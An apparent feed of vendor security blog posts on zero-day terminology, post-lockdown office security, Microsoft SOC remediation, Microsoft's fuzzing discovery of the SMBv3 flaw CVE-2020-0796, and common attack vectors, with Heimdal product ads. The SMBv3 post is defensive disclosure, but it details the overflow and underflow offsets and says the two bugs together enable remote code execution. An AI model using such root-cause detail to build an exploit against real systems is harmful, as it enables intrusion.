The term “zero day” is valid in both contexts. It’s typically used in reference to an exploit – but not always – and in my experience, that creates some of the confusion. As a side note, in the fast-moving world of IT security and malware, confusion among security teams can only ever be a bad thing for those of us working hard to stop the bad guys from profiting. I will try to be clear in which context I’m using it throughout this blog.

So, let’s take a look at some of the more common interpretations of “zero day” and examine which ones are valid:

1) “No signature exists in my current antivirus so it can’t detect this ‘zero day’ malware.”

There are more than 725,000 new malware files released each day, but the vast majority of this is simply recompiled versions of existing malware with a new file hash. A new hash does not equal zero day malware.

2) “I’ve never seen a piece of malware get delivered like that before”

Cyber criminals are always looking for a new way to deliver their payloads and they can be pretty creative, but the moniker zero day should be reserved for malware itself and not the method of distribution.

3) “There is a vulnerability in my system which I haven’t yet got around to patching.”

There are many reasons why patches are not always immediately applied (some of them are even acceptable!) but if a piece of malware ends up exploiting a known and unpatched vulnerability, that doesn’t retroactively turn this (possibly quite old) piece of malware into a zero day version.

4) “There is a whole new type of malware”

This must surely count as a ‘zero day’ right? I’m going to argue that it doesn’t. A new type of malware is likely to mean the cyber criminals have different goals. When crypto-malware (or ransomware as it’s commonly known) began to hit people in force, this indicated that the bad guys had come up with a new way to make money – extortion. But the vulnerabilities being exploited to execute their code and the mechanisms of delivering that code to their victims’ machines were the same as before….and on that basis I wouldn’t count it as ‘zero day’.

5) “I’m aware of a newly discovered vulnerability but there is no patch currently available to fix it” (or potentially such a recent patch that there has not been an opportunity to test it within my organization)

In reality this is a rare event, however I would argue that in the event there is no patch available and therefore no way to update systems to protect against the vulnerability that this can be considered to be a ‘zero-day’ vulnerability.

6) “An unknown vulnerability has been discovered and exploited by the bad guys”

In this example nobody except the cyber criminals is even aware a vulnerability exists – and therefore nobody is even trying to fix it. THIS is a true ‘zero day’ threat….fortunately though they are actually pretty rare.

So, what does all this mean from a security perspective?

That’s going to be the subject of my next blog, so watch this space…..

The post What the hell does “zero day” even mean anymore? appeared first on McAfee Blogs.

Back to Work After Lockdown: Cyber Risks of the Post-Pandemic Era

In the wake of China lifting some of its lockdown restrictions in the Wuhan province, most of the world is looking forward to getting back to ‘normal’. According to the World Health Organization, this transition from government-enforced lockdown to a quasi-repose state, should not be taken lightly nor perceived as a callback to ‘normalcy’.

As many epidemiologists pointed out, we have yet to reach the ‘infection’ peak, meaning that a second viral wave may be lurking around the corner. In the interim, with several European countries dropping part of the lockdown-specific rules, company-owners are making the necessary preparations to accommodate all the employees who were sent to work from home.

Many challenges lie ahead, most being related to (re)constructing a (the) work environment and how to achieve total compliance with the governmental recommendations/regulations – which, literally translates to how to keep your employees safe in the ‘Post-Pandemic Era’. The apostrophes are not poetic license – the coronavirus pandemic is far from over and it’s important to keep that in mind when you begin drafting the plans on how to bring everyone back to the office.

There is another consideration – your company’s cybersecurity factor. Up till now, your sysadmins were focused on making telecommuting work – configuring the network, installing additional equipment, researching remote work-specific software.

However, not that the employees will be returning to the office, the focus must shift back to on-site network admin, which, among other things, means getting up-to-speed with your cybersecurity policies (or lack of).

In this article, I am going to go over Heimdal™ Security’s return-to-the-office, cybersecurity recommendations. And because this is a race against time, I’m going to show you how to cut some corners (not in a bad way).

The post-pandemic era office

It’s only natural to have some reservations about going back to the office. After all, we did spend the last couple of months being told to stay at home, wash our hands, and practice social distancing. The idea of heading back to the office, while the coronavirus is still active, may seem foreboding. Perhaps even confusing – how can we even think about venturing into the world when the authorities are still struggling to contain COVID hotbeds that appear overnight?

Some WHO-associated sources mentioned something about the ‘death of normalcy’. In other words, we can never go back to what we believed was ‘normal’ because the very idea of ‘commonplaceness’ is what led us to this conundrum.

We need to change and that’s a fact. ‘But how?’ is the question du jour. Do we simply go back to our regular, and very mundane, 9-to-5 lives, knowing that the virus is still around? There’s no doubt that all of them are legitimate questions, which I will be addressing throughout this article.

Is it safe to go back to work? Health authorities from around the globe have already begun loosening the lockdown restrictions, allowing some industries to resume production. For instance, the Spanish health authorities, partly encouraged by the decrease in new coronavirus cases/casualties, have cleared the ‘restart’ for the construction and manufacturing industries.

On Monday, by ministerial decree, workers employed in these two sectors will return to work. I would like to remind the readers that Spain has been under lockdown since the middle of March.

Moreover, Spain is ranked fourth in deaths caused by the new coronavirus, after the United States, UK, and Italy. It’s encouraging news indeed, considering how hard this country was hit. Spain is not the only country to loosen its lockdown restrictions to stabilize the economy.

On the 25th of April, three US states (Georgia, Alaska, and Oklahoma), have taken the first steps in loosening some of the lockdown orders, despite the US’s death toll is around 70,000 and climbing. Even life in China, which is considered the first coronavirus hotbed, is slowly returning to normal, with more business relaunching every single day.

Returning to the office is possible and feasible. However, it will look entirely different compared to what your employees had in mind.

First of all, as an employer, you are bound by law to take every necessary to ensure the safety of your workforce and help the health authorities stem the spread of this contagion. So, right from the start, two aspects need to be tackled: legal and health-related. Of course, an equally important aspect is cybersecurity. Let’s take a closer look at each of them.

Legal Implications of Returning to Work

According to the White House officials, employers can recall the staff on premises if they meet all the requirements laid down and enforced by federal, state, and local officials. The document in question is broken down into several sections, each of them addressing a certain social category (healthcare providers, employers, employees, specific employees, and businesses). Below, you will find an excerpt from the White House’s tri-phase plan.

Guidelines for all phases


Develop and implement appropriate policies, per Federal, State, and local regulations and guidance, and informed by industry best practices, regarding:

  • Social distancing and protective equipment
  • Temperature checks
  • Sanitation
  • Use and disinfection of common and high-traffic areas
  • Business travel

Monitor the workforce for indicative symptoms. Do not allow symptomatic people to physically return to work until cleared by a medical provider.

Develop and implement policies and procedures for workforce contact tracing following employee COVID + test.”

Source: White House Gov – Opening America (Guidelines)

The European Union has also laid down strict guidelines regarding how employers should (re)act when recalling employees. According to the OSHwiki, EU’s plan of reopening businesses focuses:

  1. Minimizing exposure to COVID-19 after recalling employees,
  2. Updating your company’s risk assessment plan[i];
  3. Adapting the environment’s layout as to comply with the health authorities’ recommendations regarding social distancing and other health-related concerns;
  4. Identifying employees that are in the high-risk groups and creating a hazard-free work environment[ii];
  5. Maintaining communication with your occupational health service;
  6. Miscellaneous measures that can help your workforce cope with the changes produced by the coronavirus outbreak (i.e. a counselor to help your employees overcome anxiety, or depression, as side-effects of long-term isolation).

The same document also provides some insight on telework – bringing everybody back to the office at once would violate the social distancing rule. The obvious solution would be to allow some of your employees to continue working from home. In the long run, you can work out a rotation-based schedule to get everyone back.

Heimdal Official Logo

Simple Antivirus protection is no longer enough.

Thor Premium Enterprise

is the multi-layered Endpoint Detection and Response (EDR) approach
to organizational defense.
  • Next-gen Antivirus which stops known threats;
  • DNS traffic filter which stops unknown threats;
  • Automatic patches for your software and apps with no interruptions;
  • Protection against data leakage, APTs, ransomware and exploits;
Try it for FREE today Offer valid only for companies.

Cybersecurity concerns in the Post-Pandemic Era

In terms of cybercrime, the coronavirus did nothing to stop or at least dilute the number of cyberattacks. Although in some countries the healthcare system is on the brink of collapse, that did not stop malicious actors from taking advantage of the confusion to stage debilitating ransomware attacks. The oil industry has also been targeted, as well as SMBs that fast-tracked the remote work initiative while sacrificing their cybersecurity posture.

Because I do a lot of research in the cyber-resilience area, I usually come across various forums where sysadmins ask all kind of security-related questions. In one thread, there was this sysadmin who said that his CEO ordered him to give every employee admin-type privilege before sending them to work from home. Needless to say, this type of praxis can lead to all manner of entanglements, not to mention the fact that you would be offering hackers several access points for data exfiltration.

This should be in a way construed as typical corona-related behavior. It goes further than that. Oftentimes, decision-makers, who lack cybersecurity training, will often make the mistake of overruling the sysadmin’s decisions in the area of security. A grave mistake, indeed, one that can cost companies millions of dollars.

Consider an alternative scenario – a lack of funding. An expanding startup just doesn’t have the financial needs to secure all the vital areas, leaving sysadmins to work with the tools they have on hands. Take patching, for instance. Nobody gives patching any attention until the company reaches the 20+ endpoint milestone. Then it becomes problematic, especially when there is only one sysadmin. What happens after that?

System administrators will use automatic patching and deployment solutions like WSUS and SCCM to ensure that are endpoints are running the latest Windows versions or that the proprietary software has been patched.

Even when you’re overseeing a 20+ endpoint network, using either one of those can create more issues than they can solve. This is not me putting the kibosh on Microsoft’s auto-patching, management, and deployment software, but, considering the speed that was required to set up a stable remote work network, SCCM and WSUS is simply not feasible.

Readers should remember that more than 80% of a machine’s vulnerabilities can be fixed through patching. Right now, the emphasis is on automatic tools that can deploy patches and updates on the fly.

Heimdal™ Security’s Thor Premium Enterprise, our company’s unique threat-hunting, and vulnerability remediation solution can help your sysadmin deploy updates and patches from anywhere in the world. Thor Premium Enterprise is a cloud-native solution, which means that you won’t have to worry about saving those patches/updates locally before they are applied.

Furthermore, on-demand, you can also add Infinity Management to your Thor Premium Enterprise suite. IM provides you with granular control over your endpoints and, most importantly, over what kind of software was installed on those machines. From there, you can force-install applications, roll back to a previous version, deploy and install proprietary software\update\patches, and much more.


Back to work in the Post-Pandemic era? It is possible, but we have and need to follow some rules. As a company-owner, you have to guarantee the safety of your employees, no matter if it’s related to health or cybersecurity.

One sensible step towards reopening your business would be to work with the local authorities to make sure you meet all the requirements. Furthermore, you should also offer some degree of flexibility. Perhaps not all of them are thrilled at the thought of going back to the office considering that the coronavirus pandemic is far from over. Be mindful of your employees’ wishes and work with them to come up with the best solution.

[i] A company-wide analysis that must include a risk evaluation paper, risk control, safety measures, mitigation, risk management tools, and training.

[ii] If your office cannot guarantee the safety of your high-risk employees during regular office hours, it’s advisable to allow them to continue working from a home-type environment.

The post Back to Work After Lockdown: Cyber Risks of the Post-Pandemic Era appeared first on Heimdal Security Blog.

Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2

This is the sixth blog in the Lessons learned from the Microsoft SOC series designed to share our approach and experience from the front lines of our security operations center (SOC) protecting Microsoft and our Detection and Response Team (DART) helping our customers with their incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

COVID-19 and the SOC

Before we conclude the day in the life, we thought we would share an analyst’s eye view of the impact of COVID-19. Our analysts are mostly working from home now and our cloud based tooling approach enabled this transition to go pretty smoothly. The differences in attacks we have seen are mostly in the early stages of an attack with phishing lures designed to exploit emotions related to the current pandemic and increased focus on home firewalls and routers (using techniques like RDP brute-forcing attempts and DNS poisoning—more here). The attack techniques they attempt to employ after that are fairly consistent with what they were doing before.

A day in the life—remediation

When we last left our heroes in the previous entry, our analyst had built a timeline of the potential adversary attack operation. Of course, knowing what happened doesn’t actually stop the adversary or reduce organizational risk, so let’s remediate this attack!

  1. Decide and act—As the analyst develops a high enough level of confidence that they understand the story and scope of the attack, they quickly shift to planning and executing cleanup actions. While this appears as a separate step in this particular description, our analysts often execute on cleanup operations as they find them.

Big Bang or clean as you go?

Depending on the nature and scope of the attack, analysts may clean up attacker artifacts as they go (emails, hosts, identities) or they may build a list of compromised resources to clean up all at once (Big Bang)

  • Clean as you go—For most typical incidents that are detected early in the attack operation, analysts quickly clean up the artifacts as we find them. This rapidly puts the adversary at a disadvantage and prevents them from moving forward with the next stage of their attack.
  • Prepare for a Big Bang—This approach is appropriate for a scenario where an adversary has already “settled in” and established redundant access mechanisms to the environment (frequently seen in incidents investigated by our Detection and Response Team (DART) at customers). In this case, analysts should avoid tipping off the adversary until full discovery of all attacker presence is discovered as surprise can help with fully disrupting their operation. We have learned that partial remediation often tips off an adversary, which gives them a chance to react and rapidly make the incident worse (spread further, change access methods to evade detection, inflict damage/destruction for revenge, cover their tracks, etc.).Note that cleaning up phishing and malicious emails can often be done without tipping off the adversary, but cleaning up host malware and reclaiming control of accounts has a high chance of tipping off the adversary.

These are not easy decisions to make and we have found no substitute for experience in making these judgement calls. The collaborative work environment and culture we have built in our SOC helps immensely as our analysts can tap into each other’s experience to help making these tough calls.

The specific response steps are very dependent on the nature of the attack, but the most common procedures used by our analysts include:

  • Client endpoints—SOC analysts can isolate a computer and contact the user directly (or IT operations/helpdesk) to have them initiate a reinstallation procedure.
  • Server or applications—SOC analysts typically work with IT operations and/or application owners to arrange rapid remediation of these resources.
  • User accounts—We typically reclaim control of these by disabling the account and resetting password for compromised accounts (though these procedures are evolving as a large amount of our users are mostly passwordless using Windows Hello or another form of MFA). Our analysts also explicitly expire all authentication tokens for the user with Microsoft Cloud App Security.
    Analysts also review the multi-factor phone number and device enrollment to ensure it hasn’t been hijacked (often contacting the user), and reset this information as needed.
  • Service Accounts—Because of the high risk of service/business impact, SOC analysts work with the service account owner of record (falling back on IT operations as needed) to arrange rapid remediation of these resources.
  • Emails—The attack/phishing emails are deleted (and sometimes cleared to prevent recovering of deleted emails), but we always save a copy of original email in the case notes for later search and analysis (headers, content, scripts/attachments, etc.).
  • Other—Custom actions can also be executed based on the nature of the attack such as revoking application tokens, reconfiguring servers and services, and more.

Automation and integration for the win

It’s hard to overstate the value of integrated tools and process automation as these bring so many benefits—improving the analysts daily experience and improving the SOC’s ability to reduce organizational risk.

  • Analysts spend less time on each incident, reducing the attacker’s time to operation—measured by mean time to remediate (MTTR).
  • Analysts aren’t bogged down in manual administrative tasks so they can react quickly to new detections (reducing mean time to acknowledge—MTTA).
  • Analysts have more time to engage in proactive activities that both reduce organization risk and increase morale by keeping them focused on the mission.

Our SOC has a long history of developing our own automation and scripts to make analysts lives easier by a dedicated automation team in our SOC. Because custom automation requires ongoing maintenance and support, we are constantly looking for ways to shift automation and integration to capabilities provided by Microsoft engineering teams (which also benefits our customers). While still early in this journey, this approach typically improves the analyst experience and reduces maintenance effort and challenges.

This is a complex topic that could fill many blogs, but this takes two main forms:

  • Integrated toolsets save analysts manual effort during incidents by allowing them to easily navigate multiple tools and datasets. Our SOC relies heavily on the integration of Microsoft Threat Protection (MTP) tools for this experience, which also saves the automation team from writing and supporting custom integration for this.
  • Automation and orchestration capabilities reduce manual analyst work by automating repetitive tasks and orchestrating actions between different tools. Our SOC currently relies on an advanced custom SOAR platform and is actively working with our engineering teams (MTP’s AutoIR capability and Azure Sentinel SOAR) on how to shift our learnings and workload onto those capabilities.

After the attacker operation has been fully disrupted, the analyst marks the case as remediated, which is the timestamp signaling the end of MTTR measurement (which started when the analyst began the active investigation in step 2 of the previous blog).

While having a security incident is bad, having the same incident repeated multiple times is much worse.

  1. Post-incident cleanup—Because lessons aren’t actually “learned” unless they change future actions, our analysts always integrate any useful information learned from the investigation back into our systems. Analysts capture these learnings so that we avoid repeating manual work in the future and can rapidly see connections between past and future incidents by the same threat actors. This can take a number of forms, but common procedures include:
    • Indicators of Compromise (IoCs)—Our analysts record any applicable IoCs such as file hashes, malicious IP addresses, and email attributes into our threat intelligence systems so that our SOC (and all customers) can benefit from these learnings.
    • Unknown or unpatched vulnerabilities—Our analysts can initiate processes to ensure that missing security patches are applied, misconfigurations are corrected, and vendors (including Microsoft) are informed of “zero day” vulnerabilities so that they can create security patches for them.
    • Internal actions such as enabling logging on assets and adding or changing security controls. 

Continuous improvement

So the adversary has now been kicked out of the environment and their current operation poses no further risk. Is this the end? Will they retire and open a cupcake bakery or auto repair shop? Not likely after just one failure, but we can consistently disrupt their successes by increasing the cost of attack and reducing the return, which will deter more and more attacks over time. For now, we must assume that adversaries will try to learn from what happened on this attack and try again with fresh ideas and tools.

Because of this, our analysts also focus on learning from each incident to improve their skills, processes, and tooling. This continuous improvement occurs through many informal and formal processes ranging from formal case reviews to casual conversations where they tell the stories of incidents and interesting observations.

As caseload allows, the investigation team also hunts proactively for adversaries when they are not on shift, which helps them stay sharp and grow their skills.

This closes our virtual shift visit for the investigation team. Join us next time as we shift to our Threat hunting team (a.k.a. Tier 3) and get some hard won advice and lessons learned.

…until then, share and enjoy!

P.S. If you are looking for more information on the SOC and other cybersecurity topics, check out previous entries in the series (Part 1 | Part 2a | Part 2b | Part 3a | Part 3b), Mark’s List (, and our new security documentation site— Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Mark on LinkedIn or Twitter.

The post Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2 appeared first on Microsoft Security.

Mitigating vulnerabilities in endpoint network stacks

The skyrocketing demand for tools that enable real-time collaboration, remote desktops for accessing company information, and other services that enable remote work underlines the tremendous importance of building and shipping secure products and services. While this is magnified as organizations are forced to adapt to the new environment created by the global crisis, it’s not a new imperative. Microsoft has been investing heavily in security, and over the years our commitment to building proactive security into products and services has only intensified.

To help deliver on this commitment, we continuously find ways to improve and secure Microsoft products. One aspect of our proactive security work is finding vulnerabilities and fixing them before they can be exploited. Our strategy is to take a holistic approach and drive security throughout the engineering lifecycle. We do this by:

  • Building security early into the design of features.
  • Developing tools and processes that proactively find vulnerabilities in code.
  • Introducing mitigations into Windows that make bugs significantly harder to exploit.
  • Having our world-class penetration testing team test the security boundaries of the product so we can fix issues before they can impact customers.

This proactive work ensures we are continuously making Windows safer and finding as many issues as possible before attackers can take advantage of them. In this blog post we will discuss a recent vulnerability that we proactively found and fixed and provide details on tools and techniques we used, including a new set of tools that we built internally at Microsoft. Our penetration testing team is constantly testing the security boundaries of the product to make it more secure, and we are always developing tools that help them scale and be more effective based on the evolving threat landscape. Our investment in fuzzing is the cornerstone of our work, and we are constantly innovating this tech to keep on breaking new ground.

Proactive security to prevent the next WannaCry

In the past few years, much of our team’s efforts have been focused on uncovering remote network vulnerabilities and preventing events like the WannaCry and NotPetya outbreaks. Some bugs we have recently found and fixed include critical vulnerabilities that could be leveraged to exploit common secure remote communication tools like RDP or create ransomware issues like WannaCry: CVE-2019-1181 and CVE-2019-1182 dubbed “DejaBlue“, CVE-2019-1226 (RCE in RDP Server), CVE-2020-0611 (RCE in RDP Client), and CVE-2019-0787 (RCE in RDP client), among others.

One of the biggest challenges we regularly face in these efforts is the sheer volume of code we analyze. Windows is enormous and continuously evolving 5.7 million source code files, with more than 3,500 developers doing 1,100 pull requests per day in 440 official branches. This rapid cadence and evolution allows us to add new features as well proactively drive security into Windows.

Like many security teams, we frequently turn to fuzzing to help us quickly explore and assess large codebases. Innovations we’ve made in our fuzzing technology have made it possible to get deeper coverage than ever before, resulting in the discovery of new bugs, faster. One such vulnerability is the remote code vulnerability (RCE) in Microsoft Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and fixed on March 12, 2020.

In the following sections, we will share the tools and techniques we used to fuzz SMB, the root cause of the RCE vulnerability, and relevant mitigations to exploitation.

Fully deterministic person-in-the-middle fuzzing

We use a custom deterministic full system emulator tool we call “TKO” to fuzz and introspect Windows components.  TKO provides the capability to perform full system emulation and memory snapshottting, as well as other innovations.  As a result of its unique design, TKO provides several unique benefits to SMB network fuzzing:

  • The ability to snapshot and fuzz forward from any program state.
  • Efficiently restoring to the initial state for fast iteration.
  • Collecting complete code coverage across all processes.
  • Leveraging greater introspection into the system without too much perturbation.

While all of these actions are possible using other tools, our ability to seamlessly leverage them across both user and kernel mode drastically reduces the spin-up time for targets. To learn more, check out David Weston’s recent BlueHat IL presentation “Keeping Windows secure”, which touches on fuzzing, as well as the TKO tool and infrastructure.

Fuzzing SMB

Given the ubiquity of SMB and the impact demonstrated by SMB bugs in the past, assessing this network transfer protocol has been a priority for our team. While there have been past audits and fuzzers thrown against the SMB codebase, some of which postdate the current SMB version, TKO’s new capabilities and functionalities made it worthwhile to revisit the codebase. Additionally, even though the SMB version number has remained static, the code has not! These factors played into our decision to assess the SMB client/server stack.

After performing an initial audit pass of the code to understand its structure and dataflow, as well as to get a grasp of the size of the protocol’s state space, we had the information we needed to start fuzzing.

We used TKO to set up a fully deterministic feedback-based fuzzer with a combination of generated and mutated SMB protocol traffic. Our goal for generating or mutating across multiple packets was to dig deeper into the protocol’s state machine. Normally this would introduce difficulties in reproducing any issues found; however, our use of emulators made this a non-issue. New generated or mutated inputs that triggered new coverage were saved to the input corpus. Our team had a number of basic mutator libraries for different scenarios, but we needed to implement a generator. Additionally, we enabled some of the traditional Windows heap instrumentation using verifier, turning on page heap for SMB-related drivers.

We began work on the SMBv2 protocol generator and took a network capture of an SMB negotiation with the aim of replaying these packets with mutations against a Windows 10, version 1903 client. We added a mutator with basic mutations (e.g., bit flips, insertions, deletions, etc.) to our fuzzer and kicked off an initial run while we continued to improve and develop further.

Figure 1. TKO fuzzing workflow

A short time later, we came back to some compelling results. Replaying the first crashing input with TKO’s kdnet plugin revealed the following stack trace:

> tkofuzz.exe repro inputs\crash_6a492.txt -- kdnet:conn

Figure 2. Windbg stack trace of crash

We found an access violation in srv2!Smb2CompressionDecompress.

Finding the root cause of the crash

While the stack trace suggested that a vulnerability exists in the decompression routine, it’s the parsing of length counters and offsets from the network that causes the crash. The last packet in the transaction needed to trigger the crash has ‘\xfcSMB’ set as the first bytes in its header, making it a COMPRESSION_TRANSFORM packet.

Figure 3. COMPRESSION_TRANSFORM packet details

The SMBv2 COMPRESSION_TRANSFORM packet starts with a COMPRESSION_TRANSFORM_HEADER, which defines where in the packet the compressed bytes begin and the length of the compressed buffer.



UCHAR   Protocol[4]; // Contains 0xFC, 'S', 'M', 'B'

ULONG    OriginalMessageSize;

USHORT AlgorithmId;


ULONG Length;


In the srv2!Srv2DecompressData in the graph below, we can find this COMPRESSION_TRANSFORM_HEADER struct being parsed out of the network packet and used to determine pointers being passed to srv2!SMBCompressionDecompress.

Figure 4. Srv2DecompressData graph

We can see that at 0x7e94, rax points to our network buffer, and the buffer is copied to the stack before the OriginalCompressedSegmentSize and Length are parsed out and added together at 0x7ED7 to determine the size of the resulting decompressed bytes buffer. Overflowing this value causes the decompression to write its results out of the bounds of the destination SrvNet buffer, in an out-of-bounds write (OOBW).

Figure 5. Overflow condition

Looking further, we can see that the Length field is parsed into esi at 0x7F04, added to the network buffer pointer, and passed to CompressionDecompress as the source pointer. As Length is never checked against the actual number of received bytes, it can cause decompression to read off the end of the received network buffer. Setting this Length to be greater than the packet length also causes the computed source buffer length passed to SmbCompressionDecompress to underflow at 0x7F18, creating an out-of-bounds read (OOBR) vulnerability. Combining this OOBR vulnerability with the previous OOBW vulnerability creates the necessary conditions to leak addresses and create a complete remote code execution exploit.

Figure 6. Underflow condition

Windows 10 mitigations against remote network vulnerabilities

Our discovery of the SMBv3 vulnerability highlights the importance of revisiting protocol stacks regularly as our tools and techniques continue to improve over time. In addition to the proactive hunting for these types of issues, the investments we made in the last several years to harden Windows 10 through mitigations like address space layout randomization (ASLR), Control Flow Guard (CFG), InitAll, and hypervisor-enforced code integrity (HVCI) hinder trivial exploitation and buy defenders time to patch and protect their networks.

For example, turning vulnerabilities like the ones discovered in SMBv3 into working exploits requires finding writeable kernel pages at reliable addresses, a task that requires heap grooming and corruption, or a separate vulnerability in Windows kernel address space layout randomization (ASLR). Typical heap-based exploits taking advantage of a vulnerability like the one described here would also need to make use of other allocations, but Windows 10 pool hardening helps mitigate this technique. These mitigations work together and have a cumulative effect when combined, increasing the development time and cost of reliable exploitation.

Assuming attackers gain knowledge of our address space, indirect jumps are mitigated by kernel-mode CFG. This forces attackers to either use data-only corruption or bypass Control Flow Guard via stack corruption or yet another bug. If virtualization-based security (VBS) and HVCI are enabled, attackers are further constrained in their ability to map and modify memory permissions.

On Secured-core PCs these mitigations are enabled by default.  Secured-core PCs combine virtualization, operating system, and hardware and firmware protection. Along with Microsoft Defender Advanced Threat Protection, Secured-core PCs provide end-to-end protection against advanced threats.

While these mitigations collectively lower the chances of successful exploitation, we continue to deepen our investment in identifying and fixing vulnerabilities before they can get into the hands of adversaries.


The post Mitigating vulnerabilities in endpoint network stacks appeared first on Microsoft Security.

What Are the Main Vectors of Attack in Cybersecurity and How Do They Work?

Today’s dangerous cyber landscape demands all businesses to position themselves ahead of cybercriminals in order to maintain their safety. This always starts with identifying your weaknesses, understanding how your company may become compromised, and implementing the most appropriate prevention and detections methods that will help you achieve cyber resilience. But first, you have to understand what vectors of attack you can encounter that may disrupt your business.

What are vectors of attack?

Vectors of attack (or threat vectors) refer to the pathway that cyber attackers take to infiltrate your organization. In essence, an attack vector is a process or route a malicious hacker uses to reach a target, or in other words, the measures the attacker takes to conduct an attack.

Typically, attack vectors are intentional threats (rather than unintentional), as they do require some planning and analysis.

Various entities may exploit these vectors of attack, ranging from upset former employees to malicious hackers, cyber espionage groups, competitors, and more. Regardless of the person or group involved, they may either want to disrupt your business or steal your technology, confidential information or extort money from your employees. In any event, they will do their utmost to successfully utilize attack vectors and gain access to your systems.

Attack vectors vs. Attack surface

Attack vectors are the methods cybercriminals use to gain unauthorized access to a system, while an attack surface refers to the total number of attack vectors used by an intruder to control or steal data from your network or endpoints.

Attack vector examples in cybersecurity

Below I will briefly discuss the most common examples of vectors of attack that can threaten your organization.

#1. Insider Threats

Insider threat is one of the most common attack vectors. Still, not all types of insider threats are malicious, as naïve employees can sometimes inadvertently expose internal data. However, ill-intentioned individuals working for a company may intentionally disclose confidential information or plant malware, being fueled by various motives and for their own personal gain.

The most recent insider threat statistics reveal alarming issues that need to be considered and addressed by all organizations. For example, insider threats have increased by 47% in the past two years and 70% of organizations are witnessing more frequent insider attacks.

#2. Phishing

Phishing is merely one of many hats that social engineering wears. It involves manipulation tactics adopted by a malicious individual whose ultimate purpose is to trick employees into clicking on suspicious links, opening malware-infected email attachments, or giving away their login credentials.

The most insidious subtype of phishing is spear phishing, where very specific employees are observed in great detail only to be targeted later on by cybercriminals. This phenomenon is also part of the rising threat of Business Email Compromise (BEC), a highly sophisticated practice that can devastate companies of all sizes.

#3. Business partners

Third-party organizations can also become major vectors of attack in cybersecurity.

Some of the biggest security incidents and data breaches have been caused by vendors. Supply chain attacks are a common way for attackers to target a vendor’s customers. This is the reason why organizations large and small together with their business partners must foster a culture where cybersecurity best practices are shared and mutual transparency is demonstrated.

#4. Weak or compromised login credentials

Should your employees’ authentication credentials be too weak or become comprised, they may turn out to be an attacker’s surefire way to gain unauthorized access to your IT systems.

Usernames and passwords are the most popular form of authentication that can easily be abused through phishing, data leaks, and credential-stealing malware, giving intruders free access to your workers’ accounts.

Brute-force attacks (the practice through which attackers submit multiple passwords with the purpose of eventually guessing them) are also a serious vector of attack. In the wake of the novel coronavirus pandemic, Heimdal™ Security’s data has revealed that the number of brute-force attacks has increased exponentially. We have noticed a 5% increase in brute-force attacks after the majority of employees have started working from home.

#5. Ransomware / Malware

Ransomware continues to be a highly lucrative business for cybercriminals. Given its huge profits, it’s no surprise that ransomware has even developed into a “business” model – Ransomware as a Service. This allows it to become easily accessible even to people with rather poor technical skills but determined to profit from vulnerable users.

Unpatched vulnerabilities in your systems can allow ransomware to pass through. The most notorious ransomware attacks to date (such as WannaCry and NotPetya) could have been avoided if systems had been patched on time.

At the same time, the huge palette of other existing types of malware can facilitate the infiltration of malicious hackers inside your organization – think about worms, trojans, rootkits, adware, spyware, file-less malware, bots, and many more.

And do keep in mind that everything I’ve listed above refers to only a few vectors of attack that can affect your business.

How to protect your organization from threat vectors

Protecting your business from different attack vectors will not be difficult with the proper resources in place. Below I’ve included the main aspects you should focus on to reduce the risk of threat vectors and prevent potential future attacks.

#1. Educate your employees

We are strong advocates for continuous security education and we believe cybersecurity awareness training sessions should always be mandatory for your employees. Workers should hone their cybersecurity skills periodically, as prevention is key to keeping your business safe in today’s digital landscape. As long as cybercrime continues to thrive and be profitable, cybersecurity training should be a continuous journey inside your company.

Your workers must be taught to recognize the signs of phishing, BEC, how to create their passwords based on your internal password policy and avoid the most common password mistakes, identify different types of malware, and learn how to report cybersecurity incidents and potential threats. You can also try running phishing simulations to help them identify the tell-tale signs of phishing and avoid falling prey to these attacks.

#2. Apply the Principle of Least Privilege (PoLP)

Limiting your users’ rights to the lowest level possible that still allows them to successfully perform their tasks is the cornerstone of PoLP. This practice closes multiple security holes inside your organization, while it allows you to achieve granular control over the actions performed and eliminate the danger of insider threats.

For instance, HeimdalTM Security’s Thor AdminPrivilege is a powerful Privileged Access Management (PAM) solution that simplifies the burdensome tasks of sysadmins who now have to manually escalate and de-escalate user permissions.

Heimdal Official Logo

System admins waste 30% of their time manually managing user rights or installations.

Thor AdminPrivilege™

is the automatic Privileged Access Management (PAM) solution
which frees up huge chunks of sys-admin time.
  • Automate the elevation of admin rights on request;
  • Approve or reject escalations with one click;
  • Provide a full audit trail into user behavior;
  • Automatically de-escalate on infection;
Try it for FREE today Offer valid only for companies.

#3. Use the right cybersecurity tools

Sometimes, even the most knowledgeable employees (cybersecurity-wise) may accidentally click on malicious links or open infected email attachments. And in certain instances, cybercriminals are doing a great job masquerading as your employees’ superiors or other authoritative figures and manage to trick them into transferring large amounts of money to their accounts. For this reason, our HeimdalTM Security experts have designed next-gen cybersecurity tools and technologies with very specific vectors of attack in mind, to help organizations avoid multiple attack scenarios.

Prevention, detection, and response are the bedrock of our philosophy. As it would be impossible to discover threats individually, we’ve gone beyond signature-based anti-malware solutions that only pick up known threats. As malware attack vectors are ever-growing in size and sophistication, we look at the Internet’s infrastructure to catch threats that traditional Antivirus don’t see. We’ve developed a highly sophisticated DNS filtering solution that blocks network communication to Command & Control servers, Ransomware, next-gen attacks, and data leakages.

At the same time, since we understand the burden of manual patching, we’ve combined Windows and 3rd party software patch management into a single tool to help you remove the risk of unpatched software and systems, all at once.

Thor Premium Enterprise is our EPDR (Endpoint Prevention, Detection, and Response) solution, which combines DNS filtering, Automated Patch Management, and a next-gen Antivirus within a single interface so that you can have a complete overview on your environment.

Heimdal Official Logo

Simple Antivirus protection is no longer enough.

Thor Premium Enterprise

is the multi-layered Endpoint Detection and Response (EDR) approach
to organizational defense.
  • Next-gen Antivirus which stops known threats;
  • DNS traffic filter which stops unknown threats;
  • Automatic patches for your software and apps with no interruptions;
  • Protection against data leakage, APTs, ransomware and exploits;
Try it for FREE today Offer valid only for companies.

To Sum Up

To evade threat vectors, organizations must simultaneously rely on an ongoing employee cybersecurity education and the proper tools.

Adopting a DNS-based approach to security, which analyzes and monitors network threats and is successful in detecting unknown malware and emerging threats is essential. At the same time, eliminating attack vectors related to unpatched software and systems, as well as properly managing admin rights will help you neutralize cyber threats before they damage your organization.

